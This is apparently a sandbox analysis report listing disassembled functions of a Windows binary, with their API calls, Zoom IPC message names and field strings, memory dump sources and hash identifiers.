                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: FromApp$NeedUserConfirm$OperateType$com.Zoom.app.conf.operate.chat.facility
                • API String ID: 2610200052-4010154451
                • Opcode ID: dca872517975027225bd17470f9e2ed08f01fb85f685ddbf166d040efb10bbd7
                • Instruction ID: 3f3314b7b1fd5549d56552fedccbff64fee712b827eab07df006b80072dd4302
                • Opcode Fuzzy Hash: dca872517975027225bd17470f9e2ed08f01fb85f685ddbf166d040efb10bbd7
                • Instruction Fuzzy Hash: 04F065B0648395BFDB10AB559C47B2AA664E790F19F50C538B1446A3C1C7F44904DB75
                Function 00C6C0B0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C0B7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.framework.policy.updated,0000753A,packed_settings,config_source,policy_scene,00000004), ref: 00C6C0DB
                  • Part of subcall function 00C8BC00: __EH_prolog3.LIBCMT ref: 00C8BC07
                  • Part of subcall function 00C8BC00: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6C0E0,com.zoom.app.framework.policy.updated,0000753A,packed_settings,config_source,policy_scene,00000004), ref: 00C8BC1D
                  • Part of subcall function 00C8BCC0: __EH_prolog3_GS.LIBCMT ref: 00C8BCC7
                  • Part of subcall function 00C8BCC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C108,com.zoom.app.framework.policy.updated), ref: 00C8BCE1
                  • Part of subcall function 00C8BCC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044), ref: 00C8BD0F
                  • Part of subcall function 00C8BCC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C8BD4C
                  • Part of subcall function 00C8BCC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?), ref: 00C8BD7C
                  • Part of subcall function 00C8BCC0: EnterCriticalSection.KERNEL32(00000044), ref: 00C8BDEE
                  • Part of subcall function 00C8BCC0: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C8BE0B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: com.zoom.app.framework.policy.updated$config_source$packed_settings$policy_scene
                • API String ID: 2152042629-843568353
                • Opcode ID: ecce5ab3db692fd944e2429ce9c47ba6edbbcfaea65abe10ca9bb6394e625ec4
                • Instruction ID: 079fe80a6263b75af5cb9dcf0451e00dcac3da3ebf6b5656e9ff1aa77158962c
                • Opcode Fuzzy Hash: ecce5ab3db692fd944e2429ce9c47ba6edbbcfaea65abe10ca9bb6394e625ec4
                • Instruction Fuzzy Hash: 3FE06872A80704BBD7007B148C8A73E36609B10B16F01802CF1141E3E2CFF88A09E7B9
                Function 00C6C1C0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C1C7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.framework.policy.init_user,0000753B,packed_settings,config_source,policy_scene,00000004), ref: 00C6C1EB
                  • Part of subcall function 00C8BC00: __EH_prolog3.LIBCMT ref: 00C8BC07
                  • Part of subcall function 00C8BC00: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6C0E0,com.zoom.app.framework.policy.updated,0000753A,packed_settings,config_source,policy_scene,00000004), ref: 00C8BC1D
                  • Part of subcall function 00C8BCC0: __EH_prolog3_GS.LIBCMT ref: 00C8BCC7
                  • Part of subcall function 00C8BCC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C108,com.zoom.app.framework.policy.updated), ref: 00C8BCE1
                  • Part of subcall function 00C8BCC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044), ref: 00C8BD0F
                  • Part of subcall function 00C8BCC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C8BD4C
                  • Part of subcall function 00C8BCC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?), ref: 00C8BD7C
                  • Part of subcall function 00C8BCC0: EnterCriticalSection.KERNEL32(00000044), ref: 00C8BDEE
                  • Part of subcall function 00C8BCC0: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C8BE0B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: com.zoom.app.framework.policy.init_user$config_source$packed_settings$policy_scene
                • API String ID: 2152042629-3030442605
                • Opcode ID: a1e49d80d3e00bf7cf8f6585e2b73785024984ee0555f98172e1e8a0f1e8c1d1
                • Instruction ID: 8435f222b0acf167941d869d6b2e399774883c54954e00ef572595d5b6f2e17e
                • Opcode Fuzzy Hash: a1e49d80d3e00bf7cf8f6585e2b73785024984ee0555f98172e1e8a0f1e8c1d1
                • Instruction Fuzzy Hash: 57E092B1A80744BBC3107B145C9A77E76A05B60F56F414129F1046A3E1CBF88E4997B6
                Function 00C70300 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 22windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70307
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.microphone.create.request,00009CF4,deviceName,deviceGUID,audioCapture,00000004), ref: 00C7032A
                  • Part of subcall function 00C90DE0: __EH_prolog3.LIBCMT ref: 00C90DE7
                  • Part of subcall function 00C90DE0: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C7032F,com.zoom.app.assistant.sip.virtual.microphone.create.request,00009CF4,deviceName,deviceGUID,audioCapture,00000004), ref: 00C90DFD
                  • Part of subcall function 00C90EA0: __EH_prolog3_GS.LIBCMT ref: 00C90EA7
                  • Part of subcall function 00C90EA0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C70356), ref: 00C90EBB
                  • Part of subcall function 00C90EA0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.virtual.microphone.create.request,00000044), ref: 00C90EED
                  • Part of subcall function 00C90EA0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C90F2A
                  • Part of subcall function 00C90EA0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.virtual.microphone.create.request,?), ref: 00C90F5C
                  • Part of subcall function 00C90EA0: EnterCriticalSection.KERNEL32(00000044), ref: 00C90FCE
                  • Part of subcall function 00C90EA0: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C90FEB
                Strings
                • deviceName, xrefs: 00C7031B
                • deviceGUID, xrefs: 00C70316
                • com.zoom.app.assistant.sip.virtual.microphone.create.request, xrefs: 00C70325
                • audioCapture, xrefs: 00C70311
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: audioCapture$com.zoom.app.assistant.sip.virtual.microphone.create.request$deviceGUID$deviceName
                • API String ID: 2152042629-4234925160
                • Opcode ID: 61a483dd095d24025b49145037278e5a66e7a04c8ec2f47740b8cf3ff775dc6d
                • Instruction ID: 287c6dc9f12f2bb27ddd45257684f8b68c4bfc09b65cbbd24764c785f98bb344
                • Opcode Fuzzy Hash: 61a483dd095d24025b49145037278e5a66e7a04c8ec2f47740b8cf3ff775dc6d
                • Instruction Fuzzy Hash: 0EE0D871A40380EFE7107B589C0B72F3AA0AF40B55F608428B1445A2E2CBF40A8CD7F1
                Function 00C68310 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 22windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68317
                • ??0?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand,00000004), ref: 00C6833A
                  • Part of subcall function 00C85A10: __EH_prolog3.LIBCMT ref: 00C85A17
                  • Part of subcall function 00C85A10: ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand,00000004), ref: 00C85A2D
                  • Part of subcall function 00C85BFD: __EH_prolog3_GS.LIBCMT ref: 00C85C04
                  • Part of subcall function 00C85BFD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68366), ref: 00C85C18
                  • Part of subcall function 00C85BFD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.start,00000044), ref: 00C85C4A
                  • Part of subcall function 00C85BFD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C85C87
                  • Part of subcall function 00C85BFD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.start,?), ref: 00C85CB9
                  • Part of subcall function 00C85BFD: EnterCriticalSection.KERNEL32(00000044), ref: 00C85D2B
                  • Part of subcall function 00C85BFD: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C85D48
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@TreeV12@@
                • String ID: ProcessID$ProcessName$RecoveryCommand$com.Zoom.app.conf.start
                • API String ID: 1039806498-1322262537
                • Opcode ID: 3163a9c255b2da87680efddd1ebbf6728b679ca61719b8480b193964095cc432
                • Instruction ID: d9c5c4da2d4151ef6cef0c7833e9af13bbbb03ee85e1e3949661de919b00c856
                • Opcode Fuzzy Hash: 3163a9c255b2da87680efddd1ebbf6728b679ca61719b8480b193964095cc432
                • Instruction Fuzzy Hash: CFE09270A80B406FE3117B58AC8672D7690BB10B65F90052CB2006A3D6CBF00548DBB6
                Function 00C76770 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 22windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76777
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.ps.asyncrecording.upload_result,0001388E,recording_id,action_type,web_record_info,00000004), ref: 00C7679A
                  • Part of subcall function 00C869F0: __EH_prolog3.LIBCMT ref: 00C869F7
                  • Part of subcall function 00C869F0: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C868F5,?,?,?,?,?,00000004,00C7F6C8,?,?,?), ref: 00C86A0D
                  • Part of subcall function 00C95C82: __EH_prolog3_GS.LIBCMT ref: 00C95C89
                  • Part of subcall function 00C95C82: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C767C6), ref: 00C95C9D
                  • Part of subcall function 00C95C82: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.ps.asyncrecording.upload_result,00000044), ref: 00C95CCF
                  • Part of subcall function 00C95C82: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C95D0C
                  • Part of subcall function 00C95C82: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.ps.asyncrecording.upload_result,?), ref: 00C95D3E
                  • Part of subcall function 00C95C82: EnterCriticalSection.KERNEL32(00000044), ref: 00C95DB0
                  • Part of subcall function 00C95C82: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C95DCD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@TreeV12@@
                • String ID: action_type$com.zoom.ps.asyncrecording.upload_result$recording_id$web_record_info
                • API String ID: 288908543-3761408375
                • Opcode ID: 077da848706378128537f1c67a35ed814a948aecf915fc095cde71eff17095fc
                • Instruction ID: 274d6216e44ddf4ab96779360197d1eeffee642b28d5ff21e8b57b4a78c4526d
                • Opcode Fuzzy Hash: 077da848706378128537f1c67a35ed814a948aecf915fc095cde71eff17095fc
                • Instruction Fuzzy Hash: F8E0D8F1644750AFD7247F98884A75D3690A704F19F44415CB2041A2D1CBF00648D7BA
                Function 00C688B0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 22windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C688B7
                • ??0?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.pt.upload.feedback,00002756,MsgID,Options,AdditionalInfo,00000004), ref: 00C688DA
                  • Part of subcall function 00C864E0: __EH_prolog3.LIBCMT ref: 00C864E7
                  • Part of subcall function 00C864E0: ??0?$CmmMessageTemplate_2@H_J@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C688DF,com.Zoom.app.pt.upload.feedback,00002756,MsgID,Options,AdditionalInfo,00000004), ref: 00C864FD
                  • Part of subcall function 00C86757: __EH_prolog3_GS.LIBCMT ref: 00C8675E
                  • Part of subcall function 00C86757: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68906), ref: 00C86772
                  • Part of subcall function 00C86757: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.upload.feedback,00000044), ref: 00C867A4
                  • Part of subcall function 00C86757: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C867E1
                  • Part of subcall function 00C86757: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.upload.feedback,?), ref: 00C86813
                  • Part of subcall function 00C86757: EnterCriticalSection.KERNEL32(00000044), ref: 00C86885
                  • Part of subcall function 00C86757: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C868A2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: AdditionalInfo$MsgID$Options$com.Zoom.app.pt.upload.feedback
                • API String ID: 3448419098-506818149
                • Opcode ID: f4a6160dbe1b188a53bb48fd07a709e81f3a86d5e1d9670965bf15bc1dd249f2
                • Instruction ID: 3bab554ce1c987ee8808d1c63302cad02be33425bb0a852b79f139b1eff840e0
                • Opcode Fuzzy Hash: f4a6160dbe1b188a53bb48fd07a709e81f3a86d5e1d9670965bf15bc1dd249f2
                • Instruction Fuzzy Hash: 65E0D8B5A40B909BD7217B64AC0A72C7260AB00B59F90096CB2145A3D1CFF4055CDBB6
                Function 00C6A9F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 22windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A9F7
                • ??0?$CmmMessageTemplate_3@_JV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifysavechat,00002746,MeetingNo,MeetingTopic,Path,00000004), ref: 00C6AA1A
                  • Part of subcall function 00C896C0: __EH_prolog3.LIBCMT ref: 00C896C7
                  • Part of subcall function 00C896C0: ??0?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C895C5,?,?,?,?,?,00000004,00C7D4D8,?,?,?), ref: 00C896DD
                  • Part of subcall function 00C89B09: __EH_prolog3_GS.LIBCMT ref: 00C89B10
                  • Part of subcall function 00C89B09: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6AA46), ref: 00C89B24
                  • Part of subcall function 00C89B09: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifysavechat,00000044), ref: 00C89B56
                  • Part of subcall function 00C89B09: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C89B93
                  • Part of subcall function 00C89B09: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifysavechat,?), ref: 00C89BC5
                  • Part of subcall function 00C89B09: EnterCriticalSection.KERNEL32(00000044), ref: 00C89C37
                  • Part of subcall function 00C89B09: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C89C54
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@_Template_3@_TreeV12@@
                • String ID: MeetingNo$MeetingTopic$Path$com.Zoom.app.conf.notifysavechat
                • API String ID: 3464435262-1826636458
                • Opcode ID: d3300cda715a05ecf2ca1d5f11742e3ff3d9d0218527690cb40ad9ad14350a29
                • Instruction ID: e180ab0b4925a1d37dcc8a2d8b263e4336488c88313295b074819bdcd17159d2
                • Opcode Fuzzy Hash: d3300cda715a05ecf2ca1d5f11742e3ff3d9d0218527690cb40ad9ad14350a29
                • Instruction Fuzzy Hash: 54E09A70A40740ABDB207B98BD4A72D7AA0AF00B19F540458F1106A3E2CBF00908EA7A
